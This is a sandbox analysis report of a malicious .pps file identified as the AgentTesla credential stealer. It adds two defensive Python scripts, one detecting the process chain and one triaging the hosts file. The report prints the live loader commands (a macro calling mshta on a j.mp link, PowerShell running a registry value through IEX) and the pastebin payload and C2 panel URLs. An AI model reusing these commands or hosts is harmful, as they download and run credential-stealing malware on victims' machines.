
Analysis Report: Scan emco Bautechni specification.pps

Overview

General Information

Sample Name: Scan emco Bautechni specification.pps
MD5: d46764d26e05e9056d0a410ae2f9d077
SHA1: a5e439de27ad3a594bae78fd4bbd4743f9f9acfa
SHA256: 7eafb57e7fc301fabb0ce3b98092860aaac47b7118804bb8d84ddb89b9ee38f3

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Powershell execute code from registry
Yara detected AgentTesla
Connects to a URL shortener service
Connects to a pastebin service (likely for C&C)
Creates autostart registry keys with suspicious values (likely registry only malware)
Creates processes via WMI
Document contains an embedded VBA macro which may execute processes
Document exploit detected (process start blacklist hit)
Installs a global keyboard hook
Modifies the context of a thread in another process (thread injection)
Modifies the hosts file
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Adds / modifies Windows certificates
Allocates a big amount of memory (probably used for heap spraying)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Domain name seen in connection with other malware
Enables debug privileges
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w7
  • POWERPNT.EXE (PID: 3740 cmdline: 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' /AUTOMATION -Embedding MD5: 0F144ECA8CFEC8882A3809D176886255)
  • cmd.exe (PID: 3820 cmdline: C:\Windows\system32\cmd.exe /c 'C:\Users\user\Desktop\Scan emco Bautechni specification.pps' MD5: AD7B9C14083B52BC532FBA5948342B98)
    • POWERPNT.EXE (PID: 3860 cmdline: 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' /s 'C:\Users\user\Desktop\Scan emco Bautechni specification.pps' MD5: 0F144ECA8CFEC8882A3809D176886255)
      • mshta.exe (PID: 3936 cmdline: 'C:\Windows\System32\mshta.exe' 'http:\\j.mp\dmdmcrcrcryctcgufyguhmd' MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)
  • powershell.exe (PID: 4092 cmdline: powershell ((gp HKCU:\Software).Fucku)|IEX MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
    • InstallUtil.exe (PID: 2612 cmdline: {path} MD5: F9EFD49DCC1AC028017D82022D2311B0)
  • mshta.exe (PID: 2112 cmdline: 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''powershell ((gp HKCU:\Software).Fucku)|IEX'', 0 : window.close') MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)
    • powershell.exe (PID: 2316 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).Fucku)|IEX MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • InstallUtil.exe (PID: 2396 cmdline: {path} MD5: F9EFD49DCC1AC028017D82022D2311B0)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000010.00000002.1027384674.00402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000000F.00000002.1223509235.00402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000000F.00000002.1224722153.01A60000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: InstallUtil.exe PID: 2396 | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
Process Memory Space: InstallUtil.exe PID: 2612 | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Unpacked PEs

Source | Rule | Description | Author
15.2.InstallUtil.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
16.2.InstallUtil.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Sigma Overview

System Summary:

Sigma detected: Powershell execute code from registry
Source: Process started | Author: Joe Security | Data:
  Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).Fucku)|IEX
  CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).Fucku)|IEX
  CommandLine|base64offset|contains: (no value)
  Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  ParentCommandLine: 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''powershell ((gp HKCU:\Software).Fucku)|IEX'', 0 : window.close')
  ParentImage: C:\Windows\System32\mshta.exe
  ParentProcessId: 2112
  ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).Fucku)|IEX
  ProcessId: 2316
Sigma detected: MSHTA Spawning Windows Shell
Source: Process started | Author: Michael Haag | Data: identical to the event above (powershell.exe, ProcessId 2316, spawned by mshta.exe, ParentProcessId 2112)
Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started | Author: Michael Haag, Florian Roth, Markus Neis | Data:
  Command: 'C:\Windows\System32\mshta.exe' 'http:\\j.mp\dmdmcrcrcryctcgufyguhmd'
  CommandLine: 'C:\Windows\System32\mshta.exe' 'http:\\j.mp\dmdmcrcrcryctcgufyguhmd'
  CommandLine|base64offset|contains: (no value)
  Image: C:\Windows\System32\mshta.exe
  NewProcessName: C:\Windows\System32\mshta.exe
  OriginalFileName: C:\Windows\System32\mshta.exe
  ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' /s 'C:\Users\user\Desktop\Scan emco Bautechni specification.pps'
  ParentImage: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE
  ParentProcessId: 3860
  ProcessCommandLine: 'C:\Windows\System32\mshta.exe' 'http:\\j.mp\dmdmcrcrcryctcgufyguhmd'
  ProcessId: 3936
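All three Sigma hits above are process-creation checks on the parent/child image pair and the command line. As an added example (not part of the sandbox report, and not Joe Security's or the Sigma project's rule code), the following Python re-implements those three checks in simplified form and runs them over process events constructed from the Startup tree of this report. The event field names, the Office and shell image lists (a subset of what the public Sigma rules enumerate) and the registry-to-IEX regex are assumptions made for the example:

```python
"""Process-chain detection for the LOLBin chain in this report.

Added example, not from the sandbox report or any published rule set: a
minimal re-implementation of the three Sigma-style checks the report lists,
run over process-creation events constructed from the report's Startup tree.
Field names (image, cmdline, parent_image) are assumptions; map them to
Sysmon Event ID 1 or Security 4688 fields in a real pipeline.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Subsets of the image lists the public Sigma rules use (assumption: extend).
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
               "msaccess.exe", "mspub.exe", "visio.exe", "onenote.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
          "mshta.exe", "rundll32.exe", "regsvr32.exe", "wmic.exe", "sh.exe", "bash.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Matches "(gp HKCU:\Software).Fucku)|IEX": a registry read piped into
# Invoke-Expression. Assumed pattern; loaders vary aliases and quoting.
REG_TO_IEX = re.compile(
    r"\b(gp|get-itemproperty|gi|get-item)\b[^|]*\b(hkcu|hklm|hkey_\w+)\b[^|]*"
    r"\|\s*(iex|invoke-expression)\b",
    re.I,
)


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str
    cmdline: str
    parent_pid: int
    parent_image: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rstrip("\\").rsplit("\\", 1)[-1].lower()


def match_rules(ev: ProcEvent) -> list[str]:
    """Names of the simplified rules this single event triggers."""
    img, parent = basename(ev.image), basename(ev.parent_image)
    hits = []
    if parent in OFFICE_APPS and img in SHELLS:
        hits.append("Microsoft Office Product Spawning Windows Shell")
    if parent == "mshta.exe" and img in SHELLS:
        hits.append("MSHTA Spawning Windows Shell")
    if img in POWERSHELL and REG_TO_IEX.search(ev.cmdline):
        hits.append("Powershell execute code from registry")
    return hits


def detect(events) -> dict[int, list[str]]:
    """Return {pid: [rule, ...]} for every event that hits at least one rule."""
    out: dict[int, list[str]] = {}
    for ev in events:
        hits = match_rules(ev)
        if hits:
            out[ev.pid] = hits
    return out


def report_events() -> list[ProcEvent]:
    """Constructed sample events: PIDs, images and command lines as listed in
    the Startup tree of this report. The parent of PID 2112 is not shown in
    the report and is left empty here."""
    ps = r"((gp HKCU:\Software).Fucku)|IEX"
    return [
        ProcEvent(3860, r"C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE",
                  r"'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' /s "
                  r"'C:\Users\user\Desktop\Scan emco Bautechni specification.pps'",
                  3820, r"C:\Windows\system32\cmd.exe"),
        ProcEvent(3936, r"C:\Windows\System32\mshta.exe",
                  r"'C:\Windows\System32\mshta.exe' 'http:\\j.mp\dmdmcrcrcryctcgufyguhmd'",
                  3860, r"C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE"),
        ProcEvent(2112, r"C:\Windows\system32\mshta.exe",
                  r"'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'')"
                  r".Run ''powershell " + ps + r"'', 0 : window.close')",
                  0, ""),
        ProcEvent(2316, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                  r"'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " + ps,
                  2112, r"C:\Windows\system32\mshta.exe"),
        ProcEvent(2396, r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe",
                  "{path}", 2316, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    ]


if __name__ == "__main__":
    for pid, rules in sorted(detect(report_events()).items()):
        print(pid, "->", "; ".join(rules))
```

Run stand-alone it flags PID 3936 (Office spawning mshta) and PID 2316 (mshta spawning PowerShell that pulls its payload from a registry value). The PID 2112 mshta.exe launcher carries the same `gp ... | IEX` string in its own command line but is not flagged by the third check because, like the report's rule, it is scoped to powershell.exe; widening that check to any image is a cheap improvement. The regex keys on `gp`/`Get-ItemProperty` of an HK* path piped into `IEX`; real loaders vary the alias, split the pipeline across variables or encode the command, so treat it as a starting point rather than a complete rule.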

Signature Overview

AV Detection:

Multi AV Scanner detection for domain / URL
Source: http://j.mp/dmdmcrcrcryctcgufyguhmd | Virustotal: Detection: 7%
Multi AV Scanner detection for submitted file
Source: Scan emco Bautechni specification.pps | Virustotal: Detection: 69%
Source: Scan emco Bautechni specification.pps | ReversingLabs: Detection: 67%

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Process created: C:\Windows\System32\mshta.exe
Source: powerpnt.exe | Memory has grown: Private usage: 0MB later: 8MB

Networking:

Connects to a URL shortener service
Source: unknown | DNS query: name: j.mp
Connects to a pastebin service (likely for C&C)
Source: unknown | DNS query: name: pastebin.com (5 queries)
Source: Joe Sandbox View | Domain Name: j.mp
Source: Joe Sandbox View | IP Address: 104.23.99.190 (2 entries)
Source: Joe Sandbox View | IP Address: 67.199.248.16
Source: Joe Sandbox View | ASN Name: unknown
Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: Joe Sandbox View | JA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
Source: global traffic | HTTP traffic detected (2 entries):
  GET /dmdmcrcrcryctcgufyguhmd HTTP/1.1
  Accept: */*
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: j.mp
  Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 3.21.149.255 (11 entries)
Source: C:\Windows\System32\mshta.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B18OHZEN\dmdmcrcrcryctcgufyguhmd[1].htm
Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown | DNS traffic detected: queries for: j.mp
Source: InstallUtil.exe, 0000000F.00000002.1225241519.01D02000.00000004.00000001.sdmp | String found in binary or memory: http://3.21.149.255
Source: InstallUtil.exe, 0000000F.00000002.1225241519.01D02000.00000004.00000001.sdmp | String found in binary or memory: http://3.21.149.255/webpanel/5/inc/1771f778463597.php
Source: InstallUtil.exe, 0000000F.00000002.1224722153.01A60000.00000004.00000001.sdmp | String found in binary or memory: http://3.21.149.255x&7k
Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmp | String found in binary or memory: http://cacerts.digicert.com/CloudFlareIncECCCA-2.crt0
Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmp | String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmp | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmp | String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: mshta.exe, 00000005.00000003.781080248.001DB000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/CloudFlareIncECCCA2.crl06
Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/CloudFlareIncECCCA2.crl0L
Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmp | String found in binary or memory: http://j.mp/
Source: mshta.exe, 00000005.00000002.884031695.00133000.00000004.00000020.sdmp | String found in binary or memory: http://j.mp/dmdmcrcrcryctcgufyguhmd
Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0%
Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0-
Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0/
Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com05
Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.entrust.net03
Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.entrust.net0D
Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmp | String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmp | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: InstallUtil.exe, 0000000F.00000002.1224722153.01A60000.00000004.00000001.sdmp | String found in binary or memory: https://FVGmXuB4VHYmlkm6XZpF.com
Source: InstallUtil.exe, 0000000F.00000002.1224722153.01A60000.00000004.00000001.sdmp | String found in binary or memory: https://FVGmXuB4VHYmlkm6XZpF.comP
Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmp | String found in binary or memory: https://pastebin.com/
Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmp, dmdmcrcrcryctcgufyguhmd[1].htm.5.dr | String found in binary or memory: https://pastebin.com/raw/Bnv7ruYp
Source: mshta.exe, 00000005.00000003.781080248.001DB000.00000004.00000001.sdmp | String found in binary or memory: https://pastebin.com/raw/Bnv7ruYp...
Source: mshta.exe, 00000005.00000003.781080248.001DB000.00000004.00000001.sdmp | String found in binary or memory: https://pastebin.com/raw/Bnv7ruYp....p
Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.925219414.001A5000.00000004.00000001.sdmp | String found in binary or memory: https://pastebin.com/raw/Bnv7ruYpWebKit/536.5
Source: mshta.exe, 00000005.00000002.896937022.00155000.00000004.00000001.sdmp | String found in binary or memory: https://pastebin.com/raw/Bnv7ruYpcku)
Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmp | String found in binary or memory: https://pastebin.com/raw/Bnv7ruYpd
Source: mshta.exe, 00000005.00000003.775267366.02B82000.00000004.00000001.sdmp | String found in binary or memory: https://pastebin.com/raw/Bnv7ruYphttps://pastebin.com/raw/Bnv7ruYp
Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmp | String found in binary or memory: https://pastebin.com/raw/Bnv7ruYprC:
Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmp | String found in binary or memory: https://pastebin.com/raw/Bnv7ruYpu
Source: mshta.exe, 00000005.00000003.781080248.001DB000.00000004.00000001.sdmp | String found in binary or memory: https://report-uri.cloudfl
Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmp | String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmp | String found in binary or memory: https://secure.comodo.com/CPS0
Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmp | String found in binary or memory: https://www.digicert.com/CPS0
Source: unknown | Network traffic detected: HTTP traffic on port 49159 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49160 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49161 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49159
Source: unknown | Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49162 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49163
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49162
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49161
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49160

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe | Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe
Source: C:\Windows\System32\mshta.exe | Window created: window name: CLIPBRDWNDCLASS (2 entries)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe | Window created: window name: CLIPBRDWNDCLASS

Spam, unwanted Advertisements and Ransom Demands:

Modifies the hosts file
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe | File written: C:\Windows\System32\drivers\etc\hosts
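The report records that InstallUtil.exe wrote C:\Windows\System32\drivers\etc\hosts but not what it wrote. As an added triage check (not part of the sandbox report), the following Python parses a hosts file and flags every mapping that is not a default loopback entry, marking separately any that redirect a security-vendor or update domain; the sample hosts content and the watch-list of domains are constructed assumptions, not data from this analysis:

```python
"""Hosts-file triage: flag mappings added on top of the default entries.

Added example, not part of the sandbox report. SAMPLE_HOSTS is constructed
input and WATCH_DOMAINS is an assumed starter list of domains that stealers
and loaders commonly blackhole to break updates and AV telemetry.
"""
from __future__ import annotations

import ipaddress

LOOPBACK = {"127.0.0.1", "::1"}
DEFAULT_NAMES = {"localhost", "localhost.localdomain", "broadcasthost",
                 "ip6-localhost", "ip6-loopback", "ip6-allnodes", "ip6-allrouters"}
WATCH_DOMAINS = ("microsoft.com", "windowsupdate.com", "virustotal.com",
                 "symantec.com", "kaspersky.com", "mcafee.com", "avast.com",
                 "bitdefender.com", "eset.com", "sophos.com", "trendmicro.com",
                 "malwarebytes.com")

# Constructed sample: two default lines plus three entries a loader might add.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
0.0.0.0         www.virustotal.com
127.0.0.1       update.microsoft.com   # appended by the loader
10.0.0.5        intranet.example
"""


def parse_hosts(text: str) -> list[tuple[int, str, str]]:
    """Return (line number, ip, hostname) for every mapping. Comment text and
    lines whose first token is not an IP are skipped, as the resolver skips them."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        try:
            ip = ipaddress.ip_address(parts[0])
        except ValueError:
            continue
        for name in parts[1:]:
            entries.append((lineno, str(ip), name.lower().rstrip(".")))
    return entries


def is_watched(name: str) -> bool:
    """True if name is one of the watched domains or a subdomain of one."""
    return any(name == d or name.endswith("." + d) for d in WATCH_DOMAINS)


def suspicious_entries(text: str) -> list[tuple[int, str, str, str]]:
    """Return (line, ip, name, reason) for every mapping that is not a
    default loopback entry; watched domains get a more specific reason."""
    findings = []
    for lineno, ip, name in parse_hosts(text):
        if ip in LOOPBACK and name in DEFAULT_NAMES:
            continue
        reason = ("security/update domain redirected" if is_watched(name)
                  else "non-default mapping")
        findings.append((lineno, ip, name, reason))
    return findings


if __name__ == "__main__":
    for line, ip, name, reason in suspicious_entries(SAMPLE_HOSTS):
        print(f"line {line}: {ip} -> {name}: {reason}")
```

On a live host, read the file with the path from the report and compare against a known-good copy where one exists; a mapping to 0.0.0.0 or 127.0.0.1 for any vendor or update domain is the pattern to act on, while internal mappings such as the intranet line are usually legitimate and only need confirming with the owner.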

System Summary:

Document contains an embedded VBA macro which may execute processes
Source: Scan emco Bautechni specification.pps | OLE, VBA macro line: Shell "curl"
Source: VBA code instrumentation | OLE, VBA macro: Module Slide, Function Page, API IWshShell3.Run(""mshta""http:\\j.mp\dmdmcrcrcryctcgufyguhmd"")
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe | Code functions (15_2_*): 0028B362 NtQuerySystemInformation; 0028B331 NtQuerySystemInformation; 00B6F210; 00B6DBF8; 00B6E3E8; 00B6E835; 00B6E791; 00B6F200; 03AA1FF2; 03AA8B36; 03AAA70C; 03AAB280; 03AA4A70; 03AA51A8; 03AA0910; 03AAE948; 03AA74F0; 03AA9038; 03AA0070; 03AA2FAC; 03AA33A0; 03AA33F7; 03AA2FF5; 03AA4F68; 03AA3349; 03AA4F58; 03AA1FF2; 03AA329B; 03AA32F2; 03AA2ACB; 03AA4A68; 03AA5648; 03AA3244; 03AA6DB8; 03AA5198; 03AA3196; 03AA31ED; 03AA293F; 03AA313F; 03AA90A8; 03AA34A5; 03AA30E8; 03AA34FC; 03AA9028; 03AA344E; 03AA304C; 03AAA857; 041B4C18; 041B4A1C; 041B015E; 041B2641; 041B3B40; 041B0568; 041B1288; 041B1BE0; 041B0F0A; 041B4C08; 041B5938; 041B3B30; 041B5929; 041B0558; 041B1278; 041B2868; 041B34A0; 041B08D8; 0427C008; 0427F108; 0427D248; 0427E258; 0427C758; 0427F9A8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe | Code functions (16_2_*): 00B2DBF8; 00B2E3E8; 00B2E835; 00B2E791
                Source: Scan emco Bautechni specification.ppsOLE, VBA macro line: Sub Auto_Close()
                Source: VBA code instrumentationOLE, VBA macro: Module Calculator, Function Auto_Close
                Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: 15.2.InstallUtil.exe.400000.0.unpack, xgw.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 15.2.InstallUtil.exe.400000.0.unpack, xgw.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: 16.2.InstallUtil.exe.400000.0.unpack, xgw.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 16.2.InstallUtil.exe.400000.0.unpack, xgw.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: classification engine | Classification label: mal100.troj.adwa.spyw.expl.evad.winPPS@15/12@6/4
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe | Code function: 15_2_0028B1E6 AdjustTokenPrivileges,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe | Code function: 15_2_0028B1AF AdjustTokenPrivileges,
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Scan emco Bautechni specification.LNK
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRD61F.tmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\mshta.exe | WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\mshta.exe | File read: C:\Windows\System32\drivers\etc\hosts
